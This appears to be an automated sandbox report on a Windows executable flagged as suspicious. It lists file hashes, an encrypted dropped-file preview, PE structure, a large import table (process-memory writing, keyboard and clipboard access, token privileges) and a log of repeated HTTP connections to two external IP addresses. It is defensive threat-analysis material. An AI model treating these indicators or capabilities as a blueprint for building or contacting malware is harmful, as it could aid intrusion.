                                                      Preview:...3TEXQ@HNG..PV.87LO73W.XQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO7.WEX_[.@G.>.w.9{.nc[>6x!6')5*Zp5,VY#;.Q2e*$*h')ks..mUX(*.>ZO|QDHNGK7)WD..,(..7".l$/.].l-_.V..k%?.^..wW7..QT$rWT.EXQDHNGKg.VMt6MO..H.XQDHNGK7.VO9<MD73.AXQDHNGK7P6Y87L_73W5\QDH.GK'PVM:7LI73WEXQDNNGK7PVM8GHO71WEXQDHLG..PV]87\O73WUXQTHNGK7PFM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7~"(@CLO77.AXQTHNG.3PV]87LO73WEXQDHNGk7P6M87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNG
                                                      Process:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.995348669440679
                                                      Encrypted:true
                                                      SSDEEP:6144:GxAQPVybdVVpe5NXBGgKQM14kECFAqzfk0Qz9K8Xl:GfPVyJVVpqNXJIECJzfVQZ3l
                                                      MD5:2803879FEB74DA0BBFD90D1DCC071F28
                                                      SHA1:1AC3AB28F40FF152A011435EF7219201865CB5E1
                                                      SHA-256:ADC11FD3677971BD1E8A1C3FD99DA98596B3543C5D03B360133689A929759E8C
                                                      SHA-512:25192E7637AD404BD4B061646D23B120BE074D5D812E089E5CF898FBA485F2E52230968B22D3E25B14DE101D648B85757E8F0ACF264F94F2A4AFFB3719B416B1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...3TEXQ@HNG..PV.87LO73W.XQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO7.WEX_[.@G.>.w.9{.nc[>6x!6')5*Zp5,VY#;.Q2e*$*h')ks..mUX(*.>ZO|QDHNGK7)WD..,(..7".l$/.].l-_.V..k%?.^..wW7..QT$rWT.EXQDHNGKg.VMt6MO..H.XQDHNGK7.VO9<MD73.AXQDHNGK7P6Y87L_73W5\QDH.GK'PVM:7LI73WEXQDNNGK7PVM8GHO71WEXQDHLG..PV]87\O73WUXQTHNGK7PFM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7~"(@CLO77.AXQTHNG.3PV]87LO73WEXQDHNGk7P6M87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNG
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.210131508271491
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:fFoOcuxK7M.exe
                                                      File size:1'227'776 bytes
                                                      MD5:72fc342138f06b0dfd4c6bdd3edd676d
                                                      SHA1:dfd756902a23521df608df3f809d71971059970b
                                                      SHA256:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c
SHA512: 5cb55be2d32d43391b4a32e095baf3e56846cef240cf1ac33ba5a211a27cf098da90bb8e1a4b635fcbe68e88b4bab8b871211f40fd4e21e52a02b0061a05129b
SSDEEP: 24576:nu6J33O0c+JY5UZ+XC0kGso6FaM69VN4SK+/Ixh2cpWY:hu0c++OCvkGs9FaM6bN4SK+/IjIY
TLSH: 4545CE2273DDC360CB669173BF6AB7016EBF7C614630B85B2F880D7DA950162162D7A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6758F65E [Wed Dec 11 02:18:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction (disassembly at entrypoint)
call 00007F75F0E5A45Ah
jmp 00007F75F0E4D224h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F75F0E4D3AAh
cmp edi, eax
jc 00007F75F0E4D70Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F75F0E4D3A9h
rep movsb
jmp 00007F75F0E4D6BCh
cmp ecx, 00000080h
jc 00007F75F0E4D574h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F75F0E4D3B0h
bt dword ptr [004BE324h], 01h
jc 00007F75F0E4D880h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F75F0E4D54Dh
test edi, 00000003h
jne 00007F75F0E4D55Eh
test esi, 00000003h
jne 00007F75F0E4D53Dh
bt edi, 02h
jnc 00007F75F0E4D3AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F75F0E4D3B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F75F0E4D405h
bt esi, 03h
jnc 00007F75F0E4D458h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x63364 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12b000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x63364 | 0x63400 | ef923991c73356d929ed53d2e2f326ca | False | 0.9340586626259446 | data | 7.907113106302105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12b000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x5a629 | data | | | 1.0003268353425154
RT_GROUP_ICON | 0x129de4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x129e5c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x129e70 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x129e84 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x129e98 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x129f74 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
                                                      Jan 10, 2025 21:47:43.723150015 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.325855970 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.328685045 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.328768969 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:45.223117113 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.243134975 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.248163939 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.248379946 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.263134003 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.268027067 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.268137932 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910240889 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910454035 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910540104 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:47.770009041 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.788233042 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.793446064 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:48.793520927 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.802963018 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.807810068 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476176977 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476269007 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476341009 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:49.480279922 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:49.485394001 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:54.509275913 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.514108896 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:54.515217066 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.531306982 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.536156893 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.120342016 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123480082 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123496056 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123537064 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:55.123572111 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:56.039134026 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.054733038 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.059633970 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.059919119 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.076729059 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.081507921 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636166096 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636430025 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636490107 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.636563063 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636610985 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:58.593313932 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.601098061 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.605994940 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:59.606066942 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.623163939 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.628058910 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:59.628137112 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.159053087 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.160706997 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.160726070 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.163275957 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:01.129396915 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.945161104 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.950201988 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:02.950443029 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.960645914 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.965847015 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513480902 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513495922 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513616085 CET5000380192.168.2.6108.181.189.7
